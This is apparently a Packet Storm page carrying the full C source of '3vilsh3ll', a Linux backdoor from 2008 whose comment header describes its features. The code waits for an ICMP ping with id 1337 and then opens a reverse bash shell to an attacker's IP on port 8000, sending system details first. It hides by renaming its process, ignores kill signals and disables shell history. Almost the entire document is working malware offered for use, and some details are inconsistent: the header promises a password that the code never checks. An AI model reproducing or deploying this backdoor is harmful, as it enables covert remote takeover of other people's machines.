3vilsh3ll is a remote backdoor that shuffles a shell back to a remote host when hit with an ICMP packet that has special settings.
a4a668163c7e61330d54c7d954f4e67c8d4b0cf20bf7c6186e755e7be503d257 /****************************************************************************
*****************************************************************************
BACKDOOR REMOTE CONNECT 3vilsh3ll v b1
AUTHOR : Simpp
WHY : Just for fub
THANK : x_hunter for english
Compile : gcc -o evilshell evilshell.c
Use : ./evilshell ( /!\ must be root for SOCK_RAW /!\ )
LICENCE GNU/GPL
Copyright 2008, Simpp ( null.sim@gmail.com )
This file is part of 3vilsh3ll
3vilsh3ll is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
3vilsh3ll is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with Foobar; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
description :
the backdoor launch the connection to the pc when it recieve the paquet
ICMP ping with the filled fields like this :
id : 1337
code : 0
type : 8
backdoor remote connect .
change the name procecus for hide the command ps .
ignore signal SIGTERM SIGINT SIGQUIT SIGSTOP for don't stop the backdoor .
redirect stderr in /dev/null for discret .
create procecus child for execute the evil code .
need passwd for connect backdoor .
redirect bash history (HISTFILE) in /dev/null for the new shell .
redirect stdout , stdin in socket client .
*****************************************************************************
****************************************************************************/
#include <errno.h>
#include <stdio.h>
#include <fcntl.h>
#include <signal.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <linux/ip.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <linux/icmp.h>
#include <sys/utsname.h>
#define HIDDEN "/usr/sbin/lpinfo"
#define VAR "HISTFILE=/dev/null"
#define IP_DST "IP_ADDRESS"
#define PORT 8000
#define PACKET_LEN (sizeof(struct icmphdr) + sizeof(struct iphdr))
#define ICMP_LEN sizeof(struct icmphdr)
#define IP_LEN sizeof(struct iphdr)
typedef struct icmphdr icmphdr_t;
typedef struct iphdr iphdr_t;
typedef struct socket_server_s socket_server_t;
typedef struct socket_client_s socket_client_t;
typedef struct packet_s packet_t;
struct socket_server_s {
int socket;
struct sockaddr_in from;
socklen_t fromlen;
} ;
struct packet_s {
icmphdr_t *icmp;
iphdr_t *ip;
char *pkt;
} ;
struct socket_client_s {
int socket;
struct sockaddr_in to;
} ;
int configure(char *argv[]);
int listne_packet(void);
int init_packet(packet_t **packet);
socket_server_t* init_server(void);
void free_packet(packet_t *packet);
void free_server(socket_server_t *server);
void start_3vilsh3ll(void);
socket_client_t* init_client(void);
void free_client(socket_client_t *client);
int socket_client_new(socket_client_t *client);
int socket_client_connect(socket_client_t *client);
int send_info(int socket);
int socket_client_connect_dup2(int socket);
int main(int argc, char *argv[])
{
if ( configure(argv) == -1 )
printf("crach");
return EXIT_SUCCESS;
}
int
configure(char *argv[])
{
pid_t pid;
int fd = 0;
int ret1, ret2 = 0;
memset(argv[0], 0, strlen(argv[0]));
strcpy(argv[0], HIDDEN);
signal(SIGQUIT, SIG_IGN);
signal(SIGTERM, SIG_IGN);
signal(SIGINT, SIG_IGN);
signal(SIGSTOP, SIG_IGN);
fd = open("/dev/null", O_WRONLY);
if ( fd == -1 )
return -1;
close(3);
close(4);
ret1 = dup2(fd, 3);
ret2 = dup2(fd, 4);
close(fd);
if ( ret1 != -1 && ret2 != -1 )
return -1;
pid = fork();
if ( pid == -1 )
return -1;
else if ( pid )
exit(0);
else {
if ( listen_packet() == -1 )
return -1;
}
return 0;
}
int
listen_packet(void)
{
packet_t *packet = NULL;
socket_server_t *server = NULL;
int ret = 0;
if ( init_packet(&packet) == -1 ) {
free_packet(packet);
return -1;
}
if ( (server = init_server()) == NULL ) {
free_packet(packet);
return -1;
}
server->socket = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
if ( server->socket == -1 ) {
free_packet(packet);
free_server(server);
return -1;
}
server->fromlen = sizeof(struct sockaddr_in);
while ( 1 ) {
ret = recvfrom(server->socket, packet->pkt, PACKET_LEN, 0,
(struct sockaddr *)&server->from, &server->fromlen);
if ( ret != -1 ) {
packet->ip = (iphdr_t *) packet->pkt;
packet->icmp = (icmphdr_t *) (packet->pkt + IP_LEN);
if ( packet->icmp->code == 0 && packet->icmp->type == 8 && packet->icmp->un.echo.id == 1337 )
start_3vilsh3ll();
memset(packet->ip, 0x0, IP_LEN);
memset(packet->icmp, 0x0, ICMP_LEN);
}
}
free_packet(packet);
free_server(server);
return 0;
}
int
init_packet(packet_t **packet)
{
*packet = NULL;
*packet = malloc(sizeof(packet_t));
if ( *packet == NULL )
return -1;
(*packet)->pkt = NULL;
(*packet)->ip = NULL;
(*packet)->icmp = NULL;
(*packet)->pkt = malloc(PACKET_LEN);
if ( (*packet)->pkt == NULL )
return -1;
memset((*packet)->pkt, 0x0, PACKET_LEN);
return 0;
}
socket_server_t*
init_server(void)
{
socket_server_t *server = NULL;
server = malloc(sizeof(socket_server_t));
if ( server != NULL )
server->socket = -1;
return server;
}
void
free_packet(packet_t *packet)
{
if ( packet != NULL ) {
if ( packet->pkt != NULL ) {
free(packet->pkt);
packet->pkt = NULL;
}
free(packet);
packet = NULL;
}
}
void
free_server(socket_server_t *server)
{
if ( server != NULL ) {
if ( server->socket != -1 )
close(server->socket);
free(server);
server = NULL;
}
}
void
start_3vilsh3ll(void)
{
socket_client_t *client = NULL;
if ( (client = init_client()) == NULL )
return;
if ( socket_client_new(client) == -1 ) {
free_client(client);
return;
}
if ( socket_client_connect(client) == -1 ) {
free_client(client);
return;
}
if ( send_info(client->socket) == -1 ) {
free_client(client);
return;
}
if ( socket_client_connect_dup2(client->socket) == -1 ) {
free_client(client);
return;
}
if ( putenv(VAR) == -1 ) {
free_client(client);
return;
}
system("/bin/bash");
free_client(client);
}
socket_client_t*
init_client(void)
{
socket_client_t *client = NULL;
client = malloc(sizeof(socket_client_t));
if ( client != NULL )
client->socket = -1;
return client;
}
void
free_client(socket_client_t *client)
{
if ( client != NULL ) {
if ( client->socket != -1 )
close(client->socket);
free(client);
client = NULL;
}
}
int
socket_client_new(socket_client_t *client)
{
client->socket = socket(AF_INET, SOCK_STREAM, 0);
if ( client->socket == -1 )
return -1;
client->to.sin_family = AF_INET;
client->to.sin_port = htons(PORT);
client->to.sin_addr.s_addr = inet_addr(IP_DST);
return 0;
}
int
socket_client_connect(socket_client_t *client)
{
int ret;
ret = connect(client->socket, (struct sockaddr *)&client->to, sizeof(client->to));
if ( ret == -1 )
return -1;
return 0;
}
int
send_info(int socket)
{
struct utsname *name = NULL;
int ret;
char info[450];
name = malloc(sizeof(struct utsname));
if ( name == NULL ) {
free(name);
return -1;
}
ret = uname(name);
if ( ret == -1 ) {
free(name);
return -1;
}
snprintf(info, sizeof(info),"\n\t - BY SIMPP BACKDOORED SYSTEM INFO -\n\nNoyau :\r\t\t\t%s\nSystem's name :\r\t\t\t%s\nVersion :\r\t\t\t%s\nProcess :\r\t\t\t%s\nName host:\r\t\t\t%s\ncmd->\n",
name->release, name->sysname, name->version, name->machine, name->nodename);
if ( send(socket, info, strlen(info), 0) == -1 ) {
free(name);
return -1;
}
free(name);
return 0;
}
int
socket_client_connect_dup2(int socket)
{
int ret1, ret2;
close(0);
close(1);
ret1 = dup2(socket, 0);
ret2 = dup2(socket, 1);
if ( ret1 == -1 || ret2 == -1 )
return -1;
return 0;
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed